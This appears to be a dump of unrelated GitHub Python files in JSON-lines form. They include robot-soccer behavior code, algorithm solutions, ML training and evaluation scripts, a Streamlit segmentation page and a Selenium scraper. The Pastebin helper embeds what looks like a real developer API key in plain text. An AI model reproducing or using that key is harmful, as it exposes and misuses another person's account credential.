attack_left = False\n side_string = str(\"left\" if attack_left else \"right\")\n memory.speech.say(\"Enemy is in the center, shooting to the \" + side_string)\n enemy_state = EnemyGoalStates.center\n elif(shift > 0.):\n memory.speech.say(\"Enemy is on the right, shooting to the left\")\n # attack_left = True\n attack_left = False\n enemy_state = EnemyGoalStates.left\n else:\n memory.speech.say(\"Enemy is on the left, shooting to the right\")\n attack_left = False\n enemy_state = EnemyGoalStates.right\n\n if(not o_goal.seen or not o_ball.seen):\n #print \"Can't find the goal / ball\"\n self.walk(-0.3, 0.0, 0.05)\n return\n\n\n gx = o_goal.visionDistance * numpy.cos(o_goal.visionBearing)\n gy = o_goal.visionDistance * numpy.sin(o_goal.visionBearing)\n bx = o_ball.visionDistance * numpy.cos(o_ball.visionBearing)\n by = o_ball.visionDistance * numpy.sin(o_ball.visionBearing)\n ex = o_enemy.visionDistance * numpy.cos(o_enemy.visionBearing)\n ey = o_enemy.visionDistance * numpy.sin(o_enemy.visionBearing)\n tx = gx\n ty = gy\n dx_gb = gx - bx\n dy_gb = gy - by\n dt_gb = numpy.arctan2(dy_gb, dx_gb)\n r_goal_ball = numpy.sqrt(dx_gb * dx_gb + dy_gb * dy_gb)\n alpha = 0.3\n r_goal_dist_filtered = alpha*r_goal_ball + (1.0-alpha)*r_goal_dist_filtered\n\n if(r_goal_dist_filtered > 2000):\n current_state = AttackingStates.dribble\n # memory.speech.say(\"Distance \" + str(int(r_goal_dist_filtered)) + \", going back\")\n return\n\n if(o_enemy.seen):\n if(attack_left):\n enemy_edge = ey + numpy.sqrt(o_enemy.radius)\n goal_edge = gy + o_goal.radius #yes it's supposed to be 
different\n ty = (enemy_edge+goal_edge)/2.0\n else:\n enemy_edge = ey - numpy.sqrt(o_enemy.radius)\n goal_edge = gy - o_goal.radius #yes it's supposed to be different\n ty = (enemy_edge+goal_edge)/2.0\n else:\n if(attack_left):\n ty += 3.0 * o_goal.radius / 8.\n else:\n ty -= 3.0 * o_goal.radius / 8.\n\n #print \"gx: \" + str(gx)\n #print \"gy: \" + str(gy)\n #print \"tx: \" + str(tx)\n #print \"ty: \" + str(ty)\n #print \"bx: \" + str(bx)\n #print \"by: \" + str(by)\n\n\n threshold = 65\n ball_x_target = 95\n ball_y_target = -100\n goal_y_target = -100\n\n #override?\n tx = gx\n ty = gy\n if(attack_left):\n ball_y_target += 0\n ty += 250\n else:\n ball_y_target -= 0\n ty -= 250\n\n if (numpy.abs(bx - ball_x_target) <= threshold) and (numpy.abs(by - ball_y_target) <= threshold) and (numpy.abs(ty - goal_y_target) <= threshold) and (numpy.abs(ty - by) <= threshold):\n kick_sent = False\n current_state = AttackingStates.kick\n return\n\n x_vel = tanhController(-(ball_x_target - bx), 10.0/1000.0, 0.3) \n y_vel = tanhController(-(ball_y_target - by), 10.0/1000.0, 0.3) \n t_vel = tanhController((ty - by), 12.0/1000.0, 0.3) \n #print \"vel x,y,t = \" + str(x_vel) + \",\" + str(y_vel) + \",\" + str(t_vel)\n self.walk(x_vel, y_vel, t_vel)\n\n def attack_kick(self):\n commands.setHeadTilt(-20)\n \n global EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir, kick_sent, kick_start_time, recovering_from_kick\n if not kick_sent:\n #print \"sending kick\"\n # memory.speech.say(\"Kicking\")\n memory.walk_request.noWalk()\n memory.kick_request.setFwdKick()\n kick_start_time = self.getTime()\n kick_sent = True\n recovering_from_kick = False\n elif not recovering_from_kick and kick_sent and (self.getTime() - kick_start_time) > 0.5 and not memory.kick_request.kick_running_:\n # print \"kick is done, recovering\"\n # self.walk(-0.2, -0.1, 0.0)\n # recovering_from_kick = True\n # elif recovering_from_kick and (self.getTime() - kick_start_time) > 7.0:\n # print \"hopefully done recovering\"\n kick_sent = False\n recovering_from_kick = False\n self.stop()\n mode = Modes.passive\n current_state = AttackingStates.dribble\n\n def run(self):\n global walk_start_time, EnemyGoalStates, enemy_state, Modes, mode, states, current_state, Fields, field, rotation_dir, kick_sent, last_mode_change_time\n\n #detect mode switches\n hf = sensors.getValue(core.headFront)\n hm = sensors.getValue(core.headMiddle)\n hr = sensors.getValue(core.headRear)\n # print \"Head: \" + str(hf) + \", \" + str(hm) + \", \" + str(hr)\n if(mode is not Modes.passive and hf and hm and hr): #need to switch of passive mode\n self.stop()\n memory.speech.say(\"Passive Mode!\")\n mode = Modes.passive\n last_mode_change_time = self.getTime()\n if(mode is not Modes.attacking and hf and hm and not hr and (self.getTime() - last_mode_change_time) > 1.0): #need to switch to attack mode\n memory.speech.say(\"Attack Mode!\")\n mode = Modes.attacking\n enemy_state = EnemyGoalStates.unknown\n kick_sent = False\n r_goal_dist_filtered = 0. 
\n current_state = AttackingStates.start\n last_mode_change_time = self.getTime()\n if(mode is not Modes.defending and hm and hr and not hf and (self.getTime() - last_mode_change_time) > 1.0): #need to switch to defense mode\n memory.speech.say(\"Defense Mode!\")\n commands.stand()\n pose_sent = False\n num_times_sent = 0\n pose_start_time = 0\n mode = Modes.defending\n current_state = DefendingStates.walk\n walk_start_time = self.getTime()\n last_mode_change_time = self.getTime()\n\n #detect kidnapping\n lfl = sensors.getValue(core.fsrLFL)\n lfr = sensors.getValue(core.fsrLFR)\n lrl = sensors.getValue(core.fsrLRL)\n lrr = sensors.getValue(core.fsrLRR)\n rfl = sensors.getValue(core.fsrRFL)\n rfr = sensors.getValue(core.fsrRFR)\n rrl = sensors.getValue(core.fsrRRL)\n rrr = sensors.getValue(core.fsrRRR)\n max_force = numpy.amax([lfl,lfr,lrl,lrr,rfl,rfr,rrl,rrr])\n # print \"lfl is \" + str(lfl)\n # print \"lfr is \" + str(lfr)\n # print \"lrl is \" + str(lrl)\n # print \"lrr is \" + str(lrr)\n # print \"rfl is \" + str(rfl)\n # print \"rfr is \" + str(rfr)\n # print \"rrl is \" + str(rrl)\n # print \"rrr is \" + str(rrr)\n # print \"max is \" + str(max_force)\n # print \"tilt \" + str((lfl+lrl)/2.-(lfr+lrr)/2.)\n if(numpy.abs(max_force) < 0.10 and mode is not Modes.passive):\n #print(\"***************************************************\")\n #print(\"***************************************************\")\n #print(\"***************************************************\")\n #print(\"numpy.abs(max_force) = \") + str(numpy.abs(max_force))\n memory.speech.say(\"Put me down!\")\n self.stop()\n mode = Modes.passive\n\n #execute the appropriate function\n if(mode is Modes.passive):\n #print \"passive\"\n self.track_ball()\n self.stop()\n return\n else:\n\n function_map = {}\n if(mode is Modes.attacking):\n #print \"Attack mode\"\n function_map = {AttackingStates.start:self.attack_start, \n AttackingStates.approach:self.attack_approach, \n AttackingStates.rotate:self.attack_rotate, \n AttackingStates.dribble:self.attack_dribble, \n AttackingStates.align:self.attack_align, \n AttackingStates.kick:self.attack_kick}\n else:\n #print \"Defense mode\"\n function_map = {DefendingStates.start:self.defense_start, \n DefendingStates.walk_center:self.defense_walk_center, \n DefendingStates.walk_left:self.defense_walk_left, \n DefendingStates.walk_right:self.defense_walk_right, \n DefendingStates.walk:self.defense_walk, \n DefendingStates.block:self.defense_block, \n DefendingStates.block_left:self.defense_block_left, \n DefendingStates.block_right:self.defense_block_right, \n DefendingStates.sit:self.defense_sit\n }\n #print \"Current state: \" + str(current_state)\n function_map[current_state]()\n\n class Off(Node):\n def run(self):\n commands.setStiffness(cfgstiff.Zero)\n if self.getTime() > 2.0:\n self.finish()\n\n def setup(self):\n self.trans(self.Stand(), C, self.Win(), C, pose.Sit(), C, self.Off())\n\n","repo_name":"ypei92/cs393r_autonomous_robot_code","sub_path":"core/python/behaviors/win.py","file_name":"win.py","file_ext":"py","file_size_in_byte":32486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"15173030209","text":"N,A = map(int,input().split())\r\nX = [int(x)-A for x in input().split()]\r\n\r\nd = {0:1} \r\n\r\nfor x in X:\r\n d_tmp = d.copy()\r\n for k in d_tmp: \r\n d[k+x] = d.get(k+x,0)+d_tmp[k]\r\nprint(d[0]-1)","repo_name":"Kawser-nerd/CLCDSA","sub_path":"Source 
Codes/AtCoder/arc060/A/4801062.py","file_name":"4801062.py","file_ext":"py","file_size_in_byte":207,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"12860612146","text":"# boj 1504 특정한 최단경로 g4\n# noj.am/1504\nimport sys; inp = sys.stdin.readline\nimport heapq\n\nN, E = map(int, inp().split())\ngraph = [[] for _ in range(N + 1)]\n\nINF = 1000000\n# start -> Trough1 -> Trough2 -> end, start -> Trough2 -> Trough1 -> end 중 최소값을 구하면 된다\ndistStart = [INF for _ in range(N + 1)]\ndistThrough1 = [INF for _ in range(N + 1)]\ndistThrough2 = [INF for _ in range(N + 1)]\n\nfor _ in range(E):\n a, b, c = map(int, inp().split())\n graph[a].append((b, c))\n graph[b].append((a, c)) # 양방향\n\ndef dijkstra(dist, start):\n pq = [(0, start)]\n dist[start] = 0\n\n while pq:\n dis, next = heapq.heappop(pq)\n if dis > dist[next]:\n continue\n\n for nextNode, nextDist in graph[next]:\n if dist[nextNode] > nextDist + dis:\n dist[nextNode] = nextDist + dis\n heapq.heappush(pq, (dist[nextNode], nextNode))\n\n\nthrough1, through2 = map(int, inp().split())\n\ndijkstra(distStart, 1) # 3개를 구해서 경우의 수를 따져 최소 경로를 구한다\ndijkstra(distThrough1, through1)\ndijkstra(distThrough2, through2)\n\nans = min(distStart[through1] + distThrough1[through2] + distThrough2[N], distStart[through2] + distThrough2[through1] + distThrough1[N])\nif ans >= INF:\n print(-1)\nelse:\n print(ans)","repo_name":"LastCow9000/Algorithms","sub_path":"Algorithm/BOJ/1504_특정한 최단경로_g4/1504.py","file_name":"1504.py","file_ext":"py","file_size_in_byte":1318,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"8750779038","text":"import argparse\nfrom tqdm import tqdm\n\nfrom reflection_classification.utils.dataset import ReflexiveDataset\nfrom reflection_classification.neural_classifier import NeuralClassifier\n\nif __name__ == \"__main__\":\n argparser = argparse.ArgumentParser()\n\n argparser.add_argument('--trained_model_dir', type=str, required=True,\n help='Local path containing pre-trained model, filled on training, or downloaded separately')\n argparser.add_argument('--sentences_dir', type=str, required=True,\n help='Directory with {split}/sentence.tsv of annotated sentences')\n argparser.add_argument('--device', type=str, help='Device used to infer. 
One of {cpu, cuda, cuda:[idx]}',\n default=\"cuda\")\n argparser.add_argument('--test_confidence_threshold', type=int,\n help='Minimal confidence threshold for sentences to test on.',\n default=5)\n argparser.add_argument('--use_context', type=bool, help='Whether the model was trainer using context.',\n default=True)\n\n args = argparser.parse_args()\n\n classifier = NeuralClassifier(args.trained_model_dir, args.use_context, args.device)\n test_sentences = ReflexiveDataset.sentences_from_tsv(args.sentences_dir, \"test\",\n args.test_confidence_threshold, args.use_context)\n\n y_pred = [classifier.predict_sentence(sentence.text, sentence.context) for sentence in tqdm(test_sentences)]\n\n y_trues = [sentence.label for sentence in test_sentences]\n\n y_truepos = [y_trues[i] == y_pred[i] for i, _ in enumerate(y_pred)]\n\n print(\"Test accuracy: %s\" % (sum(y_truepos) / len(y_truepos)))\n","repo_name":"EduMUNI/reflection-classification","sub_path":"scripts/eval_neural_classifier.py","file_name":"eval_neural_classifier.py","file_ext":"py","file_size_in_byte":1746,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"30258082239","text":"import requests\nfrom typing import Union\n\ndef create_paste(title: str, body: str, expire: str, public: bool) -> Union[str, None]:\n \"\"\"\n Create a new PasteBin paste using the PasteBin API.\n\n Args:\n title (str): The title of the new paste.\n body (str): The body text of the new paste.\n expire (str): The expiration period of the new paste. Valid values are \"N\", \"10M\", \"1H\", \"1D\", or \"1W\".\n public (bool): Whether the new paste should be publicly listed or not.\n\n Returns:\n str or None: The URL of the newly created paste if it's created successfully, or None if the new paste is not\n created successfully.\n\n Raises:\n ValueError: If the expiration period is not a valid value.\n \"\"\"\n # Fill in your own PasteBin developer API key\n api_key = \"mB2Zh82SMqpg_3BqejDt-wfobHtUZpUt\"\n\n # Construct the data dictionary for the PasteBin API\n data = {\n \"api_dev_key\": api_key,\n \"api_option\": \"paste\",\n \"api_paste_code\": body,\n \"api_paste_name\": title,\n \"api_paste_expire_date\": expire,\n \"api_paste_private\": \"0\" if public else \"1\"\n }\n \n # Make a POST request to the PasteBin API\n url = \"https://pastebin.com/api/api_post.php\"\n response = requests.post(url, data=data)\n \n # Check if the paste was created successfully\n if response.status_code == 200:\n \n # Extract the URL of the new paste from the response text\n url = response.text\n print(f\"Paste created successfully. URL: {url}\")\n return url\n else:\n print(\"Error creating paste:\", response.text)\n return None\n","repo_name":"Krunalhb/COMP593-Lab5","sub_path":"pastebin_api.py","file_name":"pastebin_api.py","file_ext":"py","file_size_in_byte":1640,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"9914042643","text":"\"\"\"\nGiven a signed 32-bit integer x, return x with its digits \nreversed. If reversing x causes the value to go outside the \nsigned 32-bit integer range [-231, 231 - 1], then return 0.\n\nAssume the environment does not allow you to store 64-bit \nintegers (signed or unsigned). 
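
A sketch, not from this repository, of the arithmetic alternative hinted at by the commented-out Option 1 below: pop digits one at a time and check the 32-bit bound before every multiply-add, so no intermediate value ever needs more than 32 bits:

def reverse_digits(x: int) -> int:
    INT_MAX = 2 ** 31 - 1
    sign = -1 if x < 0 else 1
    x, rev = abs(x), 0
    while x:
        digit = x % 10
        # bail out before rev * 10 + digit could exceed the signed 32-bit range
        if rev > (INT_MAX - digit) // 10:
            return 0
        rev = rev * 10 + digit
        x //= 10
    return sign * rev

assert reverse_digits(123) == 321
assert reverse_digits(-123) == -321
assert reverse_digits(1534236469) == 0  # 9646324351 overflows 32 bits
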
\n\nExample 1:\nInput: x = 123\nOutput: 321\n\nExample 2:\nInput: x = -123\nOutput: -321\n\nExample 3:\nInput: x = 120\nOutput: 21\n\nExample 4:\nInput: x = 0\nOutput: 0\n\nConstraints:\n-231 <= x <= 231 - 1\n\"\"\"\n\n\nclass Solution:\n def reverse(self, x: int) -> int:\n min = -2 ** 31\n max = ((2 ** 31) -1)\n \n # Option 1\n# temp = 0\n \n# while (abs(x) > 0):\n# # note: modulus and floor division operators work \n# # different for negative numbers in python than \n# # java/c++ \n# temp = (temp * 10) + int((math.fmod(x, 10)))\n# x = int(x / 10)\n \n # Option 2\n temp = (-int(str(x)[:0:-1]) if x < 0 else int(str(x)[::-1]))\n \n return (0 if (temp < min or temp > max) else temp)\n ","repo_name":"nyccowgirl/coding-challenges","sub_path":"leet/Python/reverseint.py","file_name":"reverseint.py","file_ext":"py","file_size_in_byte":1078,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"756916886","text":"import pytest\r\n\r\nfrom MidiCompose.objects import Note,Chord,ChordSequence\r\n\r\ndef test_constructor():\r\n valid = [\r\n Chord([Note(60),Note(64),Note(67)]),\r\n Chord.from_figured_bass(figured_bass=(Note(\"C3\"),[4,5,6]))\r\n ]\r\n\r\n cs = ChordSequence(chords=valid)\r\n\r\n assert len(cs) == 2\r\n assert cs[0].notes == [Note(60),Note(64),Note(67)]\r\n assert cs.max_notes == 4\r\n assert all([isinstance(c,Chord) for c in cs])\r\n\r\ndef test_constructor_fails():\r\n\r\n invalid_chords = [\r\n Chord([Note(34), Note(35)]),\r\n [36, 38]\r\n ]\r\n with pytest.raises(TypeError):\r\n cs = ChordSequence(chords=invalid_chords)\r\n\r\n\r\n","repo_name":"aParthemer/MidiCompose","sub_path":"tests/test_logic/test_harmony/test_ChordSequence.py","file_name":"test_ChordSequence.py","file_ext":"py","file_size_in_byte":655,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17179452782","text":"import subprocess\nfrom pathlib import Path\n\nimport streamlit as st\nfrom jinja2 import Environment, FileSystemLoader\n\nfrom autorad.utils import io\nfrom autorad.webapp import segmentation_utils, st_read, st_utils\n\n# get the path of the current file with pathlib.Path\nseg_dir = Path(__file__).parent.parent / \"templates/segmentation\"\njson_path = seg_dir / \"pretrained_models.json\"\nmodels_metadata = io.load_json(json_path)\n\n\ndef show():\n st_utils.show_title()\n input_dir = st_read.get_input_dir()\n model_name = None\n organ_label = None\n with st.sidebar:\n modalities = [\"CT\", \"MRI\"]\n modality = st.selectbox(\"Modality\", modalities)\n regions = segmentation_utils.get_region_names(models_metadata)\n region = st.selectbox(\"Region\", regions)\n matching_models_metadata = segmentation_utils.filter_models_metadata(\n models_metadata, modality, region\n )\n organs = segmentation_utils.get_organ_names(matching_models_metadata)\n organ = st.selectbox(\"Organ\", organs)\n if not organ:\n st.warning(\"No models found for this modality and region.\")\n if organ:\n final_models_metadata = (\n segmentation_utils.filter_models_metadata_by_organ(\n matching_models_metadata, organ\n )\n )\n final_model_names = list(final_models_metadata.keys())\n model_name = st.radio(\"Available models\", final_model_names)\n organ_label = segmentation_utils.get_organ_label(\n final_models_metadata[model_name], organ\n )\n st.markdown(\n \"\"\"\n ### Instructions\n If you don't have the segmentations for your dataset,\n you have two options: \\n\n 1. 
**Manual segmentation** - outline the organ contours by yourself in a program.\n - We recommend using [3D Slicer](https://www.slicer.org/) or [MITK](https://www.mitk.org/wiki/The_Medical_Imaging_Interaction_Toolkit_(MITK)).\n - There may be an extension/functionality (e.g. interpolation between slices) to make the process faster.\\n\n 2. **Automatic segmentation** - check in the sidebar on the left if there's a trained model available for your use case.\n - Take into account, that it'll only work when the organ and modality are matching.\n - Even then, it's not guaranteed to work well and you should always visually check the results.\n - It **requires a GPU**! The GPU should have at least 4 GB of VRAM.\n - The segmentation uses nnU-Net. If you're using it, please cite the original paper:\n `Isensee, F., Jaeger, P.F., Kohl, S.A.A. et al. \"nnU-Net: a self-configuring method for deep learning-based biomedical image segmentation.\" Nat Methods (2020). https://doi.org/10.1038/s41592-020-01008-z`\n \"\"\"\n )\n st.markdown(\"### Input\")\n nifti_dir = segmentation_utils.dicom_to_nifti_expander(data_dir=input_dir)\n st.markdown(\"### Segmentation with nnU-Net\")\n input_dir = st.text_input(\n \"Path to the directory with images\", value=nifti_dir\n )\n input_dir = Path(input_dir.strip('\"'))\n if not input_dir.is_dir():\n st.error(\"Directory not found!\")\n files = list(input_dir.glob(\"*.nii.gz\"))\n if files:\n st.success(f\"{len(files)} images found!\")\n model_dim = st.selectbox(\"Model\", [\"2D\", \"3D\"])\n mode = \"2d\" if model_dim == \"2D\" else \"3d_fullres\"\n\n # load the template\n if not model_name:\n st.stop()\n st.markdown(\n \"\"\"\n To create the automatic segmentations, you should run\n the code below in an interactive notebook:\n \"\"\"\n )\n env = Environment(loader=FileSystemLoader(str(seg_dir)))\n template = env.get_template(\"nnunet_code.py.jinja\")\n model_params = {\n \"input_dir\": input_dir,\n \"model_name\": model_name,\n \"mode\": mode,\n \"organ\": organ,\n \"organ_label\": organ_label,\n \"modality\": modality,\n \"region\": region,\n }\n code = template.render(\n header=st_read.notebook_header,\n notebook=True,\n **model_params,\n )\n notebook = st_read.to_notebook(code)\n\n st.write(\"\")\n col1, col2 = st.columns(2)\n with col1:\n run_jupyter = st.button(\"📂 Open in Jupyter Notebook\")\n with col2:\n st.download_button(\n \"📓 Download (.ipynb)\",\n notebook,\n \"segmentation.ipynb\",\n )\n if run_jupyter:\n with open(\"segmentation.ipynb\", \"w\") as f:\n f.write(notebook)\n subprocess.Popen([\"jupyter\", \"notebook\"])\n st.code(code)\n\n\nif __name__ == \"__main__\":\n show()\n","repo_name":"mahdeslami11/MRI-feilds-","sub_path":"autorad/webapp/pages/09_🫀_Automatic_segmentation.py","file_name":"09_🫀_Automatic_segmentation.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":34,"dataset":"github-code","pt":"72"} +{"seq_id":"14827158261","text":"\"\"\"Building block modules to use in network architecture\"\"\"\nfrom math import log2\nfrom collections import OrderedDict\nfrom typing import List\n\nimport torch\nimport torch.nn as nn\n\n\ndef make_mlp(\n dims: List, act: str, l_act: bool = False, bn: bool = True, dropout: float = 0.0\n):\n \"\"\"Create a simple MLP with batch-norm and dropout\n\n Args:\n dims: (List) a list containing the dimensions of MLP\n act: (str) activation function to be used. 
Valid activations are [relu, tanh, sigmoid]\n l_act: (bool) whether to use activation after the last linear layer\n bn: (bool) use batch-norm or not. Default is True\n dropout: (float) dropout percentage\n \"\"\"\n layers = []\n activation = {\n \"relu\": nn.ReLU(inplace=True),\n \"tanh\": nn.Tanh(),\n \"sigmoid\": nn.Sigmoid(),\n \"elu\": nn.ELU(),\n }[act.lower()]\n\n for i, (in_dim, out_dim) in enumerate(zip(dims[:-1], dims[1:])):\n layers.append(nn.Linear(in_dim, out_dim, bias=not bn))\n if i != (len(dims) - 2):\n if bn:\n layers.append(nn.BatchNorm1d(out_dim))\n\n layers.append(activation)\n\n if dropout > 0.0:\n layers.append(nn.Dropout(p=dropout))\n\n if l_act:\n layers.append(activation)\n\n return nn.Sequential(*layers)\n\n\ndef conv3(in_ch: int, out_ch: int, stride: int = 1) -> nn.Module:\n \"\"\"forward path in each layer with padding\"\"\"\n layer = nn.Sequential(\n nn.Conv2d(in_ch, out_ch, kernel_size=3, stride=stride, padding=1, bias=False),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_ch, out_ch, kernel_size=3, stride=stride, padding=1, bias=False),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True),\n )\n\n return layer\n\n\nclass EfficientBlock(nn.Module):\n \"\"\"ECA block based on https://ieeexplore.ieee.org/document/9156697/\"\"\"\n\n def __init__(self, channels: int, gamma: int = 2, b: int = 1):\n super().__init__()\n t = int(abs((log2(channels) + b) / gamma))\n k = t if t % 2 else t + 1\n self.conv = nn.Conv1d(1, 1, kernel_size=k, padding=int(k / 2), bias=False)\n\n def forward(self, x):\n y = nn.functional.adaptive_avg_pool2d(x, 1)\n y = self.conv(y.squeeze(-1).transpose(-1, -2))\n y = y.transpose(-1, -2).unsqueeze(-1)\n y = torch.sigmoid(y)\n\n return x * y.expand_as(x)\n\n\nclass EfficientConvBlock(nn.Module):\n \"\"\"Two layer ECA conv block based on https://ieeexplore.ieee.org/document/9156697/\"\"\"\n\n def __init__(\n self, in_ch: int, out_ch: int, stride: int = 1, gamma: int = 2, b: int = 1\n ):\n super().__init__()\n self.layer1 = nn.Sequential(\n OrderedDict(\n [\n (\"eca1\", EfficientBlock(in_ch, gamma, b)),\n (\n \"conv1\",\n nn.Sequential(\n nn.Conv2d(\n in_ch,\n 64,\n kernel_size=3,\n stride=stride,\n padding=1,\n bias=False,\n ),\n nn.BatchNorm2d(64),\n nn.ReLU(inplace=True),\n ),\n ),\n ]\n )\n )\n self.layer2 = nn.Sequential(\n OrderedDict(\n [\n (\"eca2\", EfficientBlock(64, gamma, b)),\n (\n \"conv2\",\n nn.Sequential(\n nn.Conv2d(\n 64,\n out_ch,\n kernel_size=3,\n stride=stride,\n padding=1,\n bias=False,\n ),\n nn.BatchNorm2d(out_ch),\n nn.ReLU(inplace=True),\n ),\n ),\n ]\n )\n )\n\n def forward(self, x):\n y = self.layer1(x)\n y = self.layer2(y)\n return y\n","repo_name":"mhnazeri/PMoE","sub_path":"PMoE/model/blocks/basics.py","file_name":"basics.py","file_ext":"py","file_size_in_byte":4275,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"71160756394","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function, division\nimport os\nfrom collections import Counter\n\n\nif __name__ == \"__main__\":\n with open(os.path.join('data', 'rosalind_maj.txt')) as dataset:\n results = []\n\n n, k = [int(r) for r in dataset.readline().strip().split()]\n for line in dataset:\n A = [int(r) for r in line.strip().split()]\n c = Counter(A)\n v, occ = c.most_common()[0]\n if occ > len(A) / 2:\n results.append(v)\n else:\n results.append(-1)\n 
print(*results)\n","repo_name":"luizirber/rosalind","sub_path":"maj.py","file_name":"maj.py","file_ext":"py","file_size_in_byte":595,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"43284877988","text":"from selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.support.select import Select\nimport time\n\noptions = Options()\noptions.add_argument(\"--headless\")\ndriver = webdriver.Chrome('/Users/caoxiaojie/Downloads/chromedriver',options=options)\ndriver.get('https://www.bing.com/translator')\nsearch_query = driver.find_element_by_id('t_sv')\nprint(\"Enter the string\")\nstring = input()\nsearch_query.send_keys(string)\ntime.sleep(3)\n\nselect = Select(driver.find_element_by_id('t_sl'))\nselected_option = select.first_selected_option\ns = selected_option.text\nd = s.split()[0]\nprint(d)\n\ndriver.get('https://www.collinsdictionary.com/translator')\nselect_fr = Select(driver.find_element_by_id(\"select-input\"))\nselect_fr.select_by_value(d)\nsearch = driver.find_element_by_id('input-text')\nsearch.send_keys(string)\n\nselect_desire = Select(driver.find_element_by_id(\"select-output\"))\nalllang = driver.find_element_by_id(\"select-output\")\nprint(alllang.text)\nprint(\"Choose Your Language\")\nlang = input()\nselect_desire.select_by_value(lang)\n\n\n\ndriver.find_element_by_class_name('spinner').click()\n\nans = driver.find_element_by_id('output-text')\nprint(ans.text)\nmeaning = driver.find_elements_by_css_selector('.blocDefinition.page')\nfor mean in meaning:\n print(mean.text)","repo_name":"wzzlYwzzl/notebooks","sub_path":"Spider/翻译爬取举例/BingTranslate/BingTranslate.py","file_name":"BingTranslate.py","file_ext":"py","file_size_in_byte":1355,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"71546048554","text":"from pdb import set_trace\n\nclass Var():\n def __init__(self, val, parent=None):\n self.val = val\n\n def __add__(self, x):\n set_trace()\n y = Var(self.val + x.val, self)\n self.forward_der = 1\n x.forward_der = 1\n return y\n\n def __sub__(self, x):\n set_trace()\n y = Var(self.val - x.val, self)\n self.forward_der = 1\n x.forward_der = 1\n return y\n\n def __mul__(self, x):\n set_trace()\n y = Var(self.val * x.val, self)\n self.forward_der = x.val\n x.forward_der = self.val\n return y\n\n def __pow__(self, x):\n set_trace()\n y = Var(pow(self.val, x.val), self)\n self.forward_der = x.val * self.val\n return y\n\n\n#z = (w * x - y) ** 2 + w ** 2\nw, x, y = 1, 2, 3\n\nset_trace()\n\nW = Var(w)\nX = Var(x)\nY = Var(y)\n\nL0 = W * X\nL1 = L0 - Y\nL2 = L1 ** 2\nL3 = W ** 2\nL4 = L2 + L3\n","repo_name":"gov-ind/autograd","sub_path":"p2.py","file_name":"p2.py","file_ext":"py","file_size_in_byte":905,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"40137857658","text":"import math\n\nname_series = str(input())\nduration_episode = int(input())\nduration_break = int(input())\nduration_lunch = duration_break / 8\nduration_rest = duration_break / 4\nleft_time = duration_break - duration_lunch - duration_rest\nneeded_time = abs(left_time - duration_episode)\nif left_time >= duration_episode:\n print(f\"You have enough time to watch {name_series} and left with {math.ceil(needed_time)} \\\nminutes free time.\")\nelse:\n print(f\"You don't have enough time to watch {name_series}, you need 
{math.ceil(needed_time)} more \\\nminutes.\")\n","repo_name":"HristinaMateeva/software_engineering_path_softuni","sub_path":"01_programming_basics/02_exercises/02_exercise_conditional_statements/08_lunch_break.py","file_name":"08_lunch_break.py","file_ext":"py","file_size_in_byte":554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11840268160","text":"import os\nimport time\nfrom collections import defaultdict\nimport numpy as np\nimport torch\nimport torch.cuda\nimport logging\nfrom evaluate import evaluate\nfrom src import dist_utils, slurm, util\nfrom src.index_io import load_or_initialize_index, save_embeddings_and_index, load_subset_index\nfrom src.model_io import create_checkpoint_directories, load_or_initialize_atlas_model, save_atlas_model,load_or_initialize_atlas_model_forindex\nfrom src.options import get_options\nfrom src.tasks import get_task\n# import mlflow\n# import boto3\nimport time\nimport random\nfrom src.index import DistributedIndex\nimport pandas as pd\nimport torch.distributed as dist\n\nos.environ[\"TOKENIZERS_PARALLELISM\"] = \"true\"\nGRAD_SCALE_UPPER_BOUND_MEAN: int = 1000\nGRAD_SCALE_LOWER_BOUND_MEAN: float = 0.01\nTHRESHOLD_GRAD_STATS: int = 100\n\nlogger = logging.getLogger(__name__)\n\ndef train(\n model,\n index,\n passages,\n optimizer,\n scheduler,\n retr_optimizer,\n retr_scheduler,\n retr_graph_optimizer,\n retr_graph_scheduler,\n step,\n opt,\n checkpoint_path,\n):\n # logger.info(\"train function load\")\n tb_logger = util.init_tb_logger(os.path.join(\n opt.checkpoint_dir, opt.name), is_main=opt.is_main)\n run_stats = util.WeightedAvgStats()\n unwrapped_model = util.get_unwrapped_model_if_wrapped(model)\n # logger.info(\"model load\")\n # different seed for different sampling depending on global_rank\n # print(\"## rank\", opt.global_rank, opt.seed)\n \n ## edit by sai\n torch.manual_seed(opt.global_rank + random.randint(0, 50))\n # torch.manual_seed(opt.global_rank + opt.seed)\n\n scale = 2.0\n grad_stats = defaultdict(lambda: [])\n task = get_task(opt, unwrapped_model.reader_tokenizer)\n \n index_refresh_scheduler = util.IndexRefreshScheduler(\n opt.refresh_index, opt.freeze_retriever_steps, opt.train_retriever\n )\n # epoch_count = 0\n t1 = time.time()\n step_count = 0\n logger.info(f\"step at start:{step, step_count}\")\n # while step < opt.total_steps:\n while step < opt.total_steps:\n\n data_iterator = task.data_iterator(\n opt.train_data, opt.global_rank, opt.world_size, 